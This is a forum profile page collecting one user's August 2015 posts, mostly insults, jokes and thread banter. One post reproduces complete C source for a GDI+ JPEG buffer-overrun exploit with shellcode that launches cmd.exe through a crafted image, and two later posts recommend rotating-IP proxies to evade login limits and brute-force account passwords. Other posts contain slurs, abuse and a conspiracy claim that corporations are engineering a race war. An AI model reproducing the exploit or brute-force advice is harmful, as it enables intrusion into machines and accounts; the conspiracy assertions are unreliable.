Posts by -SpectraL

1. 2015-08-09 at 9:49 PM UTC in Hiding Files in Images WITHOUT Steganography Software
   

   -SpectraL coward [the spuriously bluish-lilac bushman]

   What do you even think that means?

   
   It just means there's more than one way to skin a cat, that's all.
   
2. 2015-08-09 at 8:55 PM UTC in Hiding Files in Images WITHOUT Steganography Software
   

   -SpectraL coward [the spuriously bluish-lilac bushman]
   It is also possible to use the JPEG exploit and .jpg file to link to a remote file in such a way that the file will be inaccessible to anyone not on the white list. Other variations of the technique are possible.
   

   
     
    // CAN-2004-0200  // launch a local cmd.exe (not bound to the net)... // GDI+ buffer overrun exploit by FoToZ // NB: the headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1. // Sample shellcode is provided // You can put approx. 2500 bytes of shellcode...who needs that much anyway // Tested on an unpatched WinXP SP1  #include <direct.h> #include <stdio.h>  char shellcode[]= "\x68" // push "cmd " "\x8B\xC4" // mov eax,esp "\x50" // push eax "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1) "\xFF\xD0" // call eax ;  char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E";  char setNOPs1[]= "\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";  char setNOPs2[]= "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";  char header2[]= "\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19" "\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B" "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00" "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" "\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02" "\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01" "\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05" "\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0" "\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83" "\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03" "\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71" "\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92" "\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00" "\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC" "\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19" "\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF" "\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9" "\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F" "\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71" "\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96" "\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0" "\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23" "\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F" "\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA" "\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A" "\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B" "\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86" "\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5" "\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02" "\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47" "\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82" "\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55" "\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4" "\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84" "\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12" "\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B" "\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E" "\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B" "\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E" "\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97" "\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA" "\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2" "\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE" "\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7" "\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24" "\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B" "\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3" "\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E" "\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35" "\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD" "\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D" "\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35" "\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27" "\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B" "\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42" "\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2" "\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7" "\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46" "\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F" "\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20" "\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA" "\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F" "\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8" "\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45" "\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B" "\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82" "\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93" "\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F" "\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68" ;  void main() {         FILE *fin,*fout;         unsigned int i=0,j=0;         unsigned char c;   mkdir("FoToZ_JPEG");   fout=fopen("FoToZ_JPEG\\FoToZ.jpg","wb");                  if( !fout ) {                 printf("ERROR OPENING FILES\n");                 return;         }         printf("shellcode size is %u bytes\n", sizeof(shellcode)-1);         for(i=0;i<sizeof(shellcode)-1;i++)                 if( 0xD9FF == *(unsigned short *)&shellcode[i] ) {                         printf("WARNING: SHELLCODE CONTAINS FFh D9h\n"                                   "FIX UR SHELLCODE\n");                         return;                 }         j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;         for(i=0;i<sizeof(header1)-1;i++)   fputc(header1[i],fout);         for(i=0;i<sizeof(setNOPs1)-1;i++)   fputc(setNOPs1[i],fout);         for(i=0;i<sizeof(header2)-1;i++)   fputc(header2[i],fout);         for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs         j=i;         for(i=0;i<sizeof(shellcode)-1;i++)   fputc(shellcode[i],fout);         for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++)   fputc(0x90,fout); // stuff NOPs         // (stuffing NOPs is becoming a bad habit)         for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++)   fputc(setNOPs2[j],fout);                  fprintf(fout,"\xFF\xD9");         fcloseall(); }  

3. 2015-08-08 at 2:22 PM UTC in "Name Whiskers"
   

   -SpectraL coward [the spuriously bluish-lilac bushman]

   Quoted for spectral.

   
   
   You don't scare me, kid.
4. 2015-08-08 at 6:04 AM UTC in Bill Krozby's joke thread
   

   -SpectraL coward [the spuriously bluish-lilac bushman]
   What US state is high in the middle and round at both ends?
   
   A. Ohio
5. 2015-08-08 at 1:58 AM UTC in My swami told me there will be a race war in america
   

   -SpectraL coward [the spuriously bluish-lilac bushman]
   All the food will be gone. All the drugs will be gone. Unless you have some gold or silver on you, you won't be able to get any.
6. 2015-08-08 at 1:48 AM UTC in "Name Whiskers"
   

   -SpectraL coward [the spuriously bluish-lilac bushman]

   I get it -SpeciaL you've been victimized. It's ok i understand your frustration.

   
   There's no frustration, shit face, and the only victim here is the fool who scribbles away like a monkey on a typewriter, but no one bothers to read it.
7. 2015-08-08 at 12:14 AM UTC in "Name Whiskers"
   

   -SpectraL coward [the spuriously bluish-lilac bushman]

   Bwhahahaha, putting someone on ignore is objectively admitting that you have been thoroughly victimized. Good God SpectraL where are the days where you would engage in verbal contest for weeks on end, telling the 'kidiots' what's what. Look what you've been reduced to. You're pathetic.

   
   Key word = verbal contest. This is not a verbal contest, it is just some fucking automaton spammer dropping worthless shit out of its dumb asshole. There's been no "verbal contest", no debate, no argument, nothing even funny or witty. So while it's true I do frown on the use of the Ignore feature, as wise King Solomon once said, "For everything under the Sun there is a season", and as it turns out, no one is more deserving of being ignored than the worthless, uninteresting, stale, bland, vanilla, shit-for-brains who is TheDarkRodent. You don't want to go on Ignore? Well then, at least open your yap to say something, because I just don't have the patience anymore for drooling mouthbreathers. If you're not adding anything to the discussion, I just don't want to see your boring shit.
8. 2015-08-07 at 11:49 PM UTC in My swami told me there will be a race war in america
   

   -SpectraL coward [the spuriously bluish-lilac bushman]
   That's exactly what the corporate terrorists want, and why they are causing it. Once complete and uncontrollable chaos breaks out, you will find these same worthless parasites selling arms, supplies, food and everything else to all sides for incredible prices (gold and precious metals only - paper money will be worthless and will be thrown into the streets), and as they sit on their island retreats in the lap of luxury. People have absolutely no idea what kind of scum we are dealing with here. They've had everything planned to a T right from the get-go.
9. 2015-08-07 at 5:57 PM UTC in Bill Krozby's joke thread
   

   -SpectraL coward [the spuriously bluish-lilac bushman]
   A big moron and a little moron were sitting on a cliff overlooking the city. The big moron fell off. Why didn't the little moron fall off?
   
   A. Because he was a little more on.
10. 2015-08-07 at 5:55 PM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]

    fuck snoopy

    
    
    UMAD?
11. 2015-08-07 at 5:52 PM UTC in Sign directing bacterial traffic found in Spectral's mouth
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    It's not that he's old, it's just that he's retarded.
12. 2015-08-07 at 5:05 PM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    I'm surprised no one wants that dumb kid Snoopy back from the dead.
13. 2015-08-07 at 4:46 PM UTC in "Name Whiskers"
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    Normally, I wouldn't use the Ignore feature for any member, but since tDR just wants to spam up every thread with worthless garbage, rather than engage in any real debate or discussion, I see no reason not to use it. And now that he is on my Ignore List, I find the entire board much more appealing and interesting. I would advise you all to do the same. We used to have an old saying, "Don't Feed the Fail Troll", and it ends up it was actually very good advice, in the context of today's kidiot spammers.
14. 2015-08-07 at 3:07 AM UTC in "Name Whiskers"
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    And if the person just left a bad taste in my mouth, for example, if someone always thinks they're too big for their britches, I might attach some demeaning name-whisker to them. So if the person I disliked for such a reason was named, John, I might suddenly start addressing him as Johnieboy or JohnJohn, which, I guess, is meant to psychologically demean him, while still being at least falsely friendly to avoid an even uglier situation.
15. 2015-08-07 at 1:37 AM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    Anyone else have anyone they miss and want brought back from the dead?
16. 2015-08-07 at 12:48 AM UTC in "Name Whiskers"
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    I have this thing where, once I get to know a person a little bit and I find them interesting, I might attach a "name whisker" to them. For example, if the person's name was Bazl, I might start addressing them as, Bazler, or Bazlster, and I might even go as far as Bazlmeister. Is this a sign of a psychological disorder?
    
    Any feedback would be most appreciated.
17. 2015-08-06 at 3:26 AM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]

    okay, that one works.

    
    That one will rotate hundreds of IP addresses, so you always have a fresh, new one. Drives corrupt staff batshit crazy. Great for brute-forcing account passwords, too.
    
18. 2015-08-05 at 10:56 PM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]

    Two requirements:
    
    1). must be free
    
    2). must work on its own without me having to do anything more complicated than turning it on/off.

    
    
    It's free, and there's nothing to do but click the link and enter the URL. Stop being a lazy little baby and grow up.
19. 2015-08-05 at 10:22 PM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    I find the best proxies to use are what I call the "revolving IP CGI proxies", where you stay on the same proxy server, but the server changes the IP every few seconds to a fresh one. The 4everProxyNetwork is a great example of a rotating IP CGI proxy. Every server on it will change its IP every few seconds to a random one. Great for guessing or brute forcing passwords when you have the 5-try limit. Turns it into unlimited tries.
    
    http://www.4everproxy.com/
20. 2015-08-05 at 9:22 PM UTC in I miss Iron John
    

    -SpectraL coward [the spuriously bluish-lilac bushman]
    You could also use CGI proxies. They are easy to use and limitless. Just need a good popup/ad blocker.
    
    https://proxy.org/cgi_proxies.shtml
    
    note: the ones at the top of the list are usually fake, so use the ones about halfway down